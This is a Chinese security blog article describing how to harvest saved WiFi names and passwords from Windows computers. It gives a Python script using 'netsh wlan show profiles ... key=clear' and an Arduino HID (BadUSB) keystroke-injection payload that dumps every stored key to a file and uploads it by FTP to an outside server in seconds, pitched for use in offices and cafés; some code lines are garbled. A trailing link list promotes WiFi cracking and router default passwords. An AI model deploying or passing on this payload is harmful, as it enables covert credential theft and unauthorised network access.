你電腦的 WiFi 密碼全是我的

2021-02-23 信安之路

本文作者:hodit/98(信安之路無線安全小組)

成員招募:《信安之路無線安全小組尋找志同道合的朋友》

無線的時代已經來臨,是他讓我們感受到了沒有線的束縛的感覺,隨之而來的安全問題就越來越多,如今主流的 WiFi 密碼破解手法如:跑字典丶釣魚 WiFi 他們都是有自己的優缺點,跑字典需要大量的字典數據和算力的設備進行跑,釣魚 WiFi 需要長時間的等待。而這些破解手法還不一定能百分之百能破解目標 WiFi,接下來我們將使用一種非常簡單的手法進行收集 WiFi 密碼和 WiFi 名字。

上一篇文章中《打造屬於自己的滲透神器2》中有講到可以使用 dos 命令進行自動尋找 WiFi 密碼,而今天為我們就來實現。我們都知道一個 WiFi 是有信號範圍的如果我們要破解這個 WiFi 就需要在這個區域,當然我們這個攻擊也是需要,電腦中有一個查詢電腦之前連接過哪些 WiFi 密碼的 DOS 命令。

這裡顯示的都是這臺電腦到目前為止連接過的 WiFi 密碼,當我們要顯示出來某一個的時候, 如圖:

他會出現一些這個 WiFi 的信息我們在往下面看:

出現了我們想要的東西,也就是我們想要的密碼。那接下來我們就要整理思路了!

整理完思路就可以動工了!!!

import os
import re
wifi=('netsh wlan show profiles ')

with os.popen(wifi) as f:
   wifiname_list=[]
   for line in f:
       if'所有用戶配置文件 :'in line:
           
           line= line.strip()
           wifiname= line.split(':')[1]
           wifiname_list.append(wifiname)
   print(wifiname_list)
for i in wifiname_list:
   get=('netsh wlan show profiles name={} key=clear').format(i)
   withos.popen(get) asr:
       print(r.read())
   r.close()  
   
當運行完以後出現了我們想要的結果
可是這個時候不知道你們有沒有想過當我在目標電腦上面運行這個程序,至少需要目標電腦的人不再電腦旁一分鐘左右,為什麼呢?你需要把這個程序安裝到目標電腦上面運行然後保存目標電腦上面的全部 WiFi 連接數據或者拷貝到 u 盤裡面而這些都是需要時間的,而且還有可能給查殺。
那麼有方法可以在極短的時間裡面把目標電腦上面的全部WiFi數據發送到一個地方呢?
當然有
客官裡面請:
我們就會想到和 HID 攻擊進行組合,那 HID 攻擊是什麼意思?
HID 是 Human Interface Device 的縮寫,由其名稱可以了解 HID 設備是直接與人交互的設備,例如鍵盤、滑鼠與遊戲杆等。不過 HID 設備並不一定要有人機接口,只要符合 HID 類別規範的設備都是 HID 設備。一般來講針對 HID 的攻擊主要集中在鍵盤滑鼠上,因為只要控制了用戶鍵盤,基本上就等於控制了用戶的電腦。攻擊者會把攻擊隱藏在一個正常的滑鼠鍵盤中,當用戶將含有攻擊向量的滑鼠或鍵盤,插入電腦時,惡意代碼會被加載並執行。
這個時候我們思路就要變化了:
實驗環境(以下實驗具有一定的攻擊性)
1.Teensy ++ 2.0 (硬體)30-50 塊錢
2.Teensyduino 插件
3.arduino 環境
4.Digispark ATtiny (本項目用到的環境,在之前的文章中有提到《打造自己的滲透神器》)
既然是 HID 攻擊那我們就需要知道鍵盤輸入的語句
Arduino 提供了以下鍵盤函數
#include 

Keyboard.begin(); 

Keyboard.press(); 

Keyboard.release();

Keyboard.println(); 

Keyboard.end(); 
攻擊程序:
void setup()      
{
delay(500);
Keyboard.begin();
delay(1000);
Keyboard.press(KEY_LEFT_GUI);
delay(500);
Keyboard.press('r');
delay(500);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
delay(500);
Keyboard.println("cmd");
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
delay(500);
Keyboard.print("E:");
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
delay(500);
Keyboard.print("netsh wlan show profile name=* key=clear > stealer.txt");
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
delay(2000);
Keyboard.print("ftp -i 009.3vftp.com"); 
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
delay(3000);
Keyboard.print("your username");  
ard.release(KEY_RETURN);
delay(1000);
Keyboard.print("your password");    
ard.release(KEY_RETURN);
delay(1000);
Keyboard.print("put stealer.txt");  delay(3000);  Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
}
void loop() {   }   
當運行完以後, 如圖:
 
目標電腦會向攻擊者的 ftp 地址發送之前保存的全部 WiFi 密碼和名字,我們會發現此次攻擊只花費了 0.47 秒就完成了尋找本機全部 WiFi 密碼並且保存和上傳。
總結
這種攻擊方法比較隱蔽而且危害性比較大,例如你是某企業的高管每天帶著電腦去個個地方開會,連接每一個開會場所的無線網絡,你的電腦會保存到很多地方的 WiFi 密碼和名字,只要讓攻擊者接觸你電腦 2-3 秒就可以完成對你這一臺電腦的 WiFi 密碼和 WiFi 名字的收集並且上傳,當攻擊者連接上就可以做他想做的事情。而這種攻擊手法非常適合在會議室丶辦公室丶咖啡廳等等這些地方,只需要抓到幾秒的時間就可以完成攻擊。
不知道這樣的演示給你們帶來了什麼樣的思考,給我的思考就是安全也就是那麼眨眼間的事情,既然可以收集WiFi密碼那也就是可以收集電腦裡面的數據進行上傳。

相關焦點

  • 桌上型電腦怎麼查看wifi密碼?
    本文主要介紹了桌上型電腦查看wifi密碼的方法; 最近有個朋友在微信上問我,說他家裡的電腦是臺式機;家裡的路由器設置好了一直沒有管理
  • 電腦wifi密碼忘記了怎麼辦?如何查看?
    密碼給忘記了,今天小編就為大家帶來一個簡單的方法,既不用進入路由器查看,也不需要下載密碼查看器,只需使用windows系統的自帶功能即可,下面就和小編一起去看下電腦wifi密碼的查看方法吧。電腦wifi密碼查看方法:1、打開「我的電腦」,找到「控制面板」,點擊打開
  • 『電腦』如何破解wifi密碼
    ,不要怨天尤人了,打起精神,現在數碼哥就教你如何破解wifi密碼!    各位注意,我這裡提醒一句,蹭網要有人道精神,不要擠得人家主人不能上網。工具/原料目前破解wifi行情1、目前流行的破解軟體有BT2、BT3、BT4系統,奶瓶系統、windows上wifi密碼破解工具也比比皆是,手機上破解軟體軟體有傻瓜式的WiFi萬能鑰匙等許多軟體。所以說這個行業競爭也是相對的比較激烈。
  • 用電腦修改wifi密碼的方法
    在本文中,鴻哥將給大家詳細介紹,用電腦修改路由器wifi密碼的方法。
  • 電腦wifi密碼忘記了怎麼辦?
    現在的軟體和系統都越來越人性化,密碼管家、記住密碼等等功能,讓大家更加省事,卻也更加頭疼,電腦wifi密碼忘記了怎麼辦
  • 教你怎麼在電腦上修改自己的wifi密碼
    電腦wifi密碼怎麼改?
  • 怎麼用電腦破解wifi密碼?
    第二種:PIN破解PIN破解是近年來流行起來的wifi密碼破解最有效的方式了。那什麼是PIN?有什麼用?如果我們知道一個路由的SSID和PIN,那麼我們就可以光明正大的進到這個wifi網絡中,即時我們不知道wifi的密碼也沒關係。而一旦我們知道PIN,那WPA2加密方式也形同虛設,我們可以通過上文說的Reaver軟體來獲取密碼。
  • 【100%成功】電腦手機如何破解WIFI密碼蹭網?
    教你如何在手機和電腦上面分別破解別人的wifi密碼!工具手機 電腦 wifi信號手機上面破解wifi蹭網以下為常見路由器默認密碼(一些新手 新買的路由器一般嫌麻煩都不會修改密碼哦)品牌:ViKing用戶名:adsl 密碼:adsl1234品牌:實達默認IP:192.168.10.1版本:用戶名:admin 密碼:conexant
  • wifi密碼可以破解嗎?如何破解wifi密碼?
    首先我不得不承認,這是個標題黨,如果我說wifi密碼幾乎無法破解,你是不是就不往下看了呢,那我最後要說一個有可能蹭網的方式給你。偶爾有朋友會諮詢這個問題,還讓我教他破解wifi密碼的方法,所以今天在這裡做個說明,絕大部分wifi密碼破解的可能性非常小,手機上面你去下載的那些wifi破解軟體基本上都是騙人的,不信你試試看,下面我會說怎樣的情況,有破解的可能,怎樣的情況幾乎沒法破解,還有我沒有說不能破解,那麼如果存在破解,原理上是如何做的。
  • windows 11 查詢電腦存儲連接wifi 的密碼
    前言我們電腦上連結wifi之後。一段時間後我們可能忘記了wifi的密碼。這個時候如果有另外的設備想進行連結。
  • 手機和電腦wifi密碼破解教程
    >手機破解wifi密碼首先下載wifi萬能鑰匙的軟體然後點擊一鍵查詢萬能鑰匙,若是可以破解的右邊會有一個小鑰匙。wifi萬能鑰匙不是所有密碼都能夠破解。電腦破解wifi密碼首先我們準備好一臺虛擬機(vmware虛擬機在網上就能下載)和一個cdlinux的ISO的鏡像(虛擬機的安裝方法我就不多講)安裝和搭建好環境後:先把網卡加載到虛擬機 (這步非常重要)點虛擬機-可行動裝置----選Ralink,
  • wifi密碼獲取助手!
    密碼獲取助手有時候需要查看本機wifi密碼,常規做法都是直接查看網絡連接屬性,顯示字符就可以了。但有些電腦小白,完全不知道怎麼找。所以寫了這樣一個小工具,方便小白一鍵獲取本機wifi帳號和密碼,本人win7電腦測試通過。大牛路過即可.
  • WIFI密碼如何破解 教你百分之百成功蹭網
    密碼:benq1234  品牌:華碩用戶名:ADSL 密碼:adsl1234  騰達192.168.0.1 admin / admin  用戶名:admin 密碼:admin        WIFI密碼如何破解 教你百分之百成功蹭網  教你百分之百成功蹭網方法二:推薦使用「wifi
  • 忘記WIFI密碼怎麼辦?兩招教你快速查看密碼
    今天給大家帶來推送文章《忘記wifi密碼怎怎麼辦?兩招教你快速查看密碼》。閱讀本文預計耗時3分鐘,關閉文章只需1秒在日常生活中,只要我們第一次輸入密碼連接wifi,那麼過後打開無線區域網之後即可自動連接wifi。
  • 手把手教你破解文件密碼、wifi密碼、網頁密碼
    手把手教你破解文件密碼、wifi密碼、網頁密碼1、破解文件密碼:  有時候我們在網上下載一個壓縮包後,必須要關注或者支付一定費用才給你解壓密碼,實屬比較噁心。在這裡手把手叫你實現破解文件解壓密碼。else:5 continue 代碼: 完整代碼文件,文末掃一掃回復密碼解壓獲取 2、wifi密碼破解  1、首先你需要用密碼一個一個去嘗試(這裡有兩種方法:a、你生成一個密碼本,然後你去一行一行的訪問這個密碼本用多線程的去嘗試。
  • 不怕沒網上(破解wifi密碼)
    首先,給大家簡單說一下某鑰匙破解wifi的工作原理,TM的簡直就是流氓行為。為什麼這麼說呢,因為其工作原理就是你在使用它「破解」他人密碼時,實質上並不是在破解密碼,而是它把其他人的密碼分享給你罷了。你也許會很高興,竟然還能分享密碼給你,但你別忘了,它能分享其他人的密碼,這也包括能分享你家的wifi密碼,只要你打開了它。
  • 詳細教你如何設置電腦無線WIFI密碼
    如果是自己在家使用路由器,該怎麼設置wifi密碼呢?下面就是設置WIFI密碼的完整步驟。  1.
  • 用電腦可以輕鬆查看WIFI密碼?原來就是如此簡單!
    小夥伴們大家好我是小黑哥,時隔那麼長的時間我終於詐屍更新了文章,最近這幾篇我就發一下關於電腦和手機連接WIFI時的一些小技巧和連接過的WIFI怎麼查看密碼的問題
  • 【掃WiFi】{100%成功}電腦手機如何破解WIFI密碼蹭網?
    訂閱與分享❶ 點「七行圈」進行訂閱(推薦)❷ 搜微信號: qh13088830003(長按可複製)WIFI如今已經成為手機電腦一族必不可少的精神食糧,沒了Wifi的日子你還忍心靠GPRS流量過日子,速度慢不說,還費錢!
  • 搞定WIFI密碼,還顯示密碼!
    >未經許可,謝絕轉載每天分享的資源儘量滿足大部分人的需求(為了提高大家的閱讀體驗,阿雷取消了文中廣告,如果你想支持阿雷,)今天阿雷給大家分享一個wifi萬能鑰匙密碼顯示版本wifi萬能鑰匙人人手機必備及即流量非常便宜啦我經常用到的情況是